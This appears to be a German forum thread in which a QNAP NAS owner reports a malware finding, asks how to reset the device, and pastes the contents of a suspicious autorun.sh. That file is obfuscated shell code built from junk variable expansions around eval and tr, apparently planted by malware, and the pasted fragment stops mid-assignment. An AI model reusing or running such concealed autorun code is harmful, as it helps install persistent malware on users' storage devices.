Beiträge von georgeq

Danke für die Antworten und interessanten links!
Der oben gepostete Inhalt ist alles, was in der autorun stand, es ist nicht nur ein Auszug.
Ja, ich hab vollständige aktuelle Backups aller Daten (und der Einstellungen).
Updates liefen - abgesehen von sehr seltenen Verbindungsfehlern - regelmäßig und bis zuletzt unbehindert, d.h. Appcenter, Firmware, Virenscanner, MalwareRemover.
Wie der Schadcode aufs NAS gelangt ist, kann ich nicht eingrenzen. Schwachpunkt war vielleicht aktiviertes UPnP (ja ich weiß. Kommt nicht mehr vor) oder eine der installierten Anwendungen mit "Q" am Anfang (QSirch, QNAPcloud, Qboost, QuLog ... vor denen manche generell warnen). Ansonsten waren keine Dienste wie ftp oder ssh aktiv, qnapcloud stand auf privat, admin war nicht standardadmin, Zugriff war auf einzelne IP-Adressen eingeschränkt. Vielleicht ist der code in der autorun aber auch schon länger dort (von Zeiten, als ich noch "offener" war) und hat mit dem jetzigen Malwarebefall nichts zu tun.

Wie mache ich das NAS platt - ich vermute mal mit der ersten der angebotenen fünf Möglichkeiten?

1) Button [Werksstandards wiederherstellen & alle Volumes formatieren]
2) Button [Einstellungen rücksetzen] (Nutzerdaten behalten)
3) Button [neu initialisieren] (löscht alle Daten und "initialisiert den NAS neu")
4) Resetknopf 3 sek drücken (Systemeinstellungen auf Standard, Nutzerdaten bleiben erhalten)
5) Resetknopf 10 sek (alle Einstellungen einschließlich Benutzer, -gruppen, Freigabeordner auf Standard zurücksetzen, Nutzerdaten bleiben erhalten)

Kann ich die Sicherung der Einstellungen noch verwenden oder ist zu erwarten, dass ich mir damit wieder schädlichen Code oder schädliche Einstellungen importiere?

Beste Grüße

Hallo,

nach Hinweis auf entfernte Malware MR2101 MR2104 bei meinem QNAP NAS TS-251 Version 5.0.0 1853 habe ich zusätzlich zum Virenscanner und dem Malware remover noch den security advisor installiert und zahlreiche Verbesserungen der Sicherheit ausgeführt, u.a. die Ausführung der autorun.sh ausgeschaltet.
Mit Hilfe des Security Advisors habe ich Stufe mittlere Sicherheit umgesetzt, Antivirus meldet nichts und malware remover meldet nichts mehr.

Auf oom_reaper habe ich überprüft - die PID liegt bei 5xx, also unter 1.000, womit es dann wohl NICHT der bitcoin-miner ist.

Mehrere Neustarts, mehrere Scans.

Der kryptische Inhalt der autorun.sh (die ich nie selbst bearbeitet habe) macht mich aber stutzig - handelt es sich hier um ein Ergebnis der Malware?

Lässt sich feststellen, was hier ausgeführt worden ist / werden sollte?

Hier der Inhalt:

#!/bin/sh


unse${oYNLJVti}t; tes${KGJzI}t; ev${PHsnCYuoayMM}al${TITBRmxJDk}; fals${pTiVbAxEUNgwqq}e; ${KepfxcadRSdg}false; tes$yfidgUO$""t; ty${KmPqAdkoYABa}p${dDXdtVanluPuK}e; tru$'\x65'${XqByLP}${GmzkqA}; $ElbaMNUuFaZBThz$''fa${KtxNJoPDEFHn}lse; tes$tCwdiyUFDoMZHg$""${nqlFkt}t; f${oCkxoBfm}alse; te${FGxvVAwAAxl}s${iBVhJeKFa}t; ${XXgPIMlCQK}${vTxymzYqKCXNH}true${olNb}; ${KXsqqVizjekpF}test${CyjaItplrtyAdDF}; ty$UPmNE$""${MtjegRTa}pe; test${cdlPUQ}; fals${UwdbwuGIumJnGC}e; DMirPGwW=${gmQNblLSUsjsad}$wHPZcAKYx$''tr

Zuletzt die Frage: ist es noch notwendig oder ratsam, das NAS "platt zu machen" und neu aufzusetzen oder kann ich weiter damit arbeiten?

Vielen Dank für eure Hilfe und bitte entschuldigt, wenn die Frage hier nicht an der richtigen Stelle ist oder nicht richtig formuliert. Ich bin neu hier. Gerne gebe ich noch weitere Infos.

Raimund